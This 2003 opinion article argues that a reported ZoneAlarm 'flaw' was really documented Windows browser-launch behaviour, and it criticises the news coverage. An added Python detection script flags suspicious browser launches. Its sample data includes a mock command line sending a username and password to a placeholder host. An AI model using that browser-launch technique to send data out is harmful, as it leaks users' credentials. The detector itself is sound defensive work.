By: Mike Healan
July 8, 2003
If you pay any attention to news about software or PC security, you've no doubt heard of a severe flaw discovered recently in the popular ZoneAlarm personal firewall. You may have heard that Zone Labs initially refused to fix this flaw in the free version of their software, saying that users would need to upgrade to the expensive Pro version to fix this issue. You may also have heard that Zone Labs has backpedaled and decided to address the issue after all.
Here is something that you may not have heard. Most of that is not true. Zone Labs is not telling people to upgrade to the pro version to fix this flaw. In fact, there is no flaw to be fixed.
This all started when someone posted a hypothetical password theft exploit to Bugtraq. In his hypothetical exploit, the person speaks of a rogue application stealing the user's passwords or credit card information. This application sends a command to Windows to start the user's web browser and load an internet address. In the poster's example, the rogue application sends the information that it had stolen as part of the request to the server. The person claimed that this constituted a bug in the core design of ZoneAlarm that allows software to bypass it and access the internet.
In fact, all the person had found was a feature of Windows that is commonly known and well documented. If a program gives the Windows shell a command, and the command starts with http://, Windows determines correctly that the program wants the user's web browser to load a web page. Windows checks the registry to see which web browser the user has configured to handle web surfing, then loads the web page in that browser. If the user has set their firewall to allow their web browser to access the internet, then obviously there will be no alert.
This is not a flaw in ZoneAlarm by any conceivable stretch of the imagination. Does Zone Labs write Windows? No, Microsoft does, and yet ZoneAlarm has been singled out as being responsible for this issue.
This should never have been considered to be a ZoneAlarm problem. As a matter of fact, this shouldn't be considered to be a firewall problem at all. If you have an application stealing your passwords and trying to send them to a remote server, you should be looking your antivirus maker in the eye and asking why his software didn't catch the trojan.
To put this into simple terms, let's say that someone mugs you outside a shopping mall and steals your car. Do you blame the parking lot attendant for letting the mugger drive out with your car without realizing he shouldn't be driving it? Or do you blame mall security for not protecting you from the mugger in the first place?
The story about this so-called flaw was published by The Register, and suddenly it was news all over the internet. It became even bigger news when Zone Labs stated that they wouldn't fix it. Why should they? It is a feature of Windows that had nothing to do with their firewall. At that point, it ceased being news and became a controversy. And then, the ill-considered words of a Zone Labs executive turned it into a scandal.
This executive, Fred Felman, vice-president of products, made the very poor decision to point out to a reporter that users running the expensive professional version of ZoneAlarm were protected from this hypothetical attack by an enhanced feature not available in the free version.
Predictably, the article at ExtremeTech in which this statement was published had this as its headline:
Zone Labs Won't Fix Hole In Free Firewall
Zone Labs: Vulnerability Tied To Windows; Firm Urges Upgrade To Paid Products
Thus began the misinformed tirades against Zone Labs on discussion groups worldwide. "They are withholding the patch to force you to buy the upgrade!" is how these discussions went for the most part.
I believe that it was very poor judgement for Felman to tell a reporter that the free version wouldn't be updated to deal with the issue, then later say that the professional version does deal with it. To say something like that to a reporter was beyond foolish.
I don't believe that Zone Labs intended to use the threat of a security issue as a marketing ploy to have more of its free users buy the professional version. Felman's statement was "spun" to make it look like Zone Labs was doing just that.
This is not the only recent PR blunder committed by Zone Labs. All versions of ZoneAlarm have a feature that automatically checks for an update to the software. Zone Labs has been known to use that update feature to pitch the pro version to their free users, and many people simply turn it off as a result. A few months ago, Zone Labs removed the option that allows the user to disable update notifications in the free version of the software.
The public was outraged. Many people swore they would remove ZoneAlarm and find another firewall. I published a page on my site saying that SpywareInfo would no longer recommend ZoneAlarm and urged people to write to Zone Labs with their opinion of the situation. Zone Labs quickly reversed its decision and released a new version that included the option. Later, an employee of Zone Labs admitted to me in a letter that they had shot themselves in the foot with that whole situation.
I don't like it when a software company deliberately ignores a security problem. Last year, I and many others condemned Microsoft for doing exactly what Zone Labs has been accused wrongly of doing.
You may remember the infamous Health Center exploit that made headlines just after Service Pack 1 for Windows XP was released. This was a flaw so severe and so easy to exploit that simply clicking on a hyperlink in a web page or in an email could lead to the deletion of your computer's hard drive.
With callous disregard for the security of their users, Microsoft refused to release a patch for this vulnerability, despite having known of it for several months. The only way to fix it, they said, was to install the service pack. Eventually, in the face of all that bad publicity, Microsoft did release a separate patch.
If Zone Labs were guilty of doing that, I'd be condemning them now just as I did months ago over the update situation, and just as I condemned Microsoft last year. However, Zone Labs was framed. This was not a flaw in their software. This was not a hole. This was not a marketing ploy gone wrong.
It was some guy posting a well documented function of Windows to a Bugtraq mailing list described as a "flaw", then laying the blame for the so-called "flaw" on the wrong company. Practically all firewalls will handle this hypothetical "attack" in exactly the same manner as ZoneAlarm. They will allow the web browser access to the internet, just as the user has instructed them to do.
Now, because of misinformed flaming on discussion groups provoked by misleading articles with incorrect information, Zone Labs will release an updated version of the free firewall. The new version will include a feature already present in the Pro version. This feature differentiates between an internet connection request made by the web browser and a connection request made by a third party product that loads in the web browser.
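The point the article makes, both in its description of the Windows behaviour and in its account of the Pro feature, is that a firewall that keys on the executable name alone sees a trusted browser and nothing else; what would distinguish the hypothetical case from ordinary browsing is who started the browser and what argument it was handed. The following Python script is an added example written for this page, not code from the article or from Zone Labs, and it shows one way a host-monitoring tool could surface that context from process-creation telemetry. The event records, their field names (parent, image, cmdline), the browser list and the choice of explorer.exe as the expected parent of a user-driven launch are all constructed assumptions.

```python
"""Flag browser launches that did not come from the user's shell.

Added example for this page, not code from the article or Zone Labs.
Event records, field names and the parent/browser lists are assumptions.
"""
import re
from urllib.parse import parse_qs, urlparse

# Browser executables of interest (assumed list).
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Parents from which a user-driven browser launch normally comes (assumption).
USER_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed, simplified process-creation records: parent process image,
# created process image, and the command line the new process was given.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "iexplore.exe",
     "cmdline": "iexplore.exe"},
    {"parent": "explorer.exe", "image": "firefox.exe",
     "cmdline": "firefox.exe https://example.test/"},
    {"parent": "updater.exe", "image": "iexplore.exe",
     "cmdline": "iexplore.exe http://example.test/collect?u=alice&p=hunter2"},
    {"parent": "notepad.exe", "image": "iexplore.exe",
     "cmdline": "iexplore.exe http://example.test/help"},
]


def analyze(event):
    """Rate one event and return (severity, reason).

    severity is "none", "medium" (a non-shell parent opened a URL) or
    "high" (that URL also carries query parameters, where data could ride).
    """
    if event["image"].lower() not in BROWSERS:
        return "none", "not a browser"
    parent = event["parent"].lower()
    if parent in USER_PARENTS:
        return "none", "launched from the user's shell"
    match = URL_RE.search(event["cmdline"])
    if not match:
        return "none", f"{parent} started a browser with no URL argument"
    url = urlparse(match.group(0))
    params = parse_qs(url.query)
    if params:
        return "high", (f"{parent} opened {url.netloc}{url.path} "
                        f"with {len(params)} query parameter(s)")
    return "medium", f"{parent} opened {url.netloc}{url.path}"


def scan(events):
    """Return [(severity, reason, event)] for every flagged event."""
    findings = []
    for event in events:
        severity, reason = analyze(event)
        if severity != "none":
            findings.append((severity, reason, event))
    return findings


if __name__ == "__main__":
    for severity, reason, _ in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}")
```

Run as is, the script reports the third event as high and the fourth as medium and says nothing about the first two. The fourth event is the kind of false positive this heuristic produces (a legitimate program opening its help page), which is why a rule like this belongs in triage rather than in a blocking decision, and why, as the article says, catching the program that stole the data in the first place is the antivirus's job rather than the firewall's.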
The absence of a feature in the free version that is present in the paid version does not constitute a security hole. It just means that the free version does its job as a firewall with a minimum of bells and whistles, while those who want more options and features can support the company's efforts by purchasing the pro version. ZoneAlarm free does no less a job of denying or allowing access to the computer's ports than the Pro version.
I have noticed that the news sites covering Zone Labs' decision to release the new version have decided to present the news in terms of Zone Labs "fixing a security hole" by releasing a "patch", even though this is not the case. The headline at ExtremeTech reads "Update: Zone Labs Now Says It Will Patch Free Firewall". The Register states that "A vulnerability in Zone Labs' freeware version of ZoneAlarm firewall will be patched within 'the next two weeks'". There are other examples of this at other news sites.
A controversial story is good for a news site. It fires up people's emotions. It makes people talk about it. Those people talk to their friends and post it on message boards. It brings in a lot of readers. And it also makes the logs show a lot of hits on the sponsors' advertisements.
It also does a disservice to the readers of those sites when the information simply isn't true. I've had to learn the hard way to be careful with what I say. When I rant about something, hundreds of thousands of people read it, and it could cause a very real effect on the object of my ranting. Look what happened to InBoxCop recently if you doubt that.
These news sites have considerably more readers than I do, and I don't want to begin to imagine the damage that has been done to Zone Labs' reputation over something that logically cannot be considered to be their fault.
I had incorrect information published about me once, so I know how irritating this can be. One of the owners of Neowin, not understanding the situation about which he was reporting, published misleading statements about me and my newsletter. After several people posted comments trying to set the facts straight, the article was closed to further comments.
Six months later, that still irritates me.
This article is located at http://www.spywareinfoforum.info/articles/zonelabs/exploit_hoax.php
Links:
http://www.zonealarm.com/ ZoneAlarm web site
http://www.securityfocus.com/archive/1/326371 Bugtraq posting
http://www.theregister.co.uk/content/55/31481.html The Register's article about the exploit
http://www.extremetech.com/article2/0,3973,1185848,00.asp Zone Labs won't fix the "flaw"
http://www.spywareinfoforum.info/newletter/sep21,2002#xpsp1 SpywareInfo condemns Microsoft
http://www.extremetech.com/article2/0,3973,1179181,00.asp Zone Labs patches ZoneAlarm
http://www.theregister.co.uk/content/55/31605.html Zone Labs patches ZoneAlarm
http://www.spywareinfoforum.info/articles/inboxcop/ InBoxCop article at SpywareInfo
http://www.spywareinfoforum.info/newletter/dec31,2002#ls Misleading statements about SpywareInfo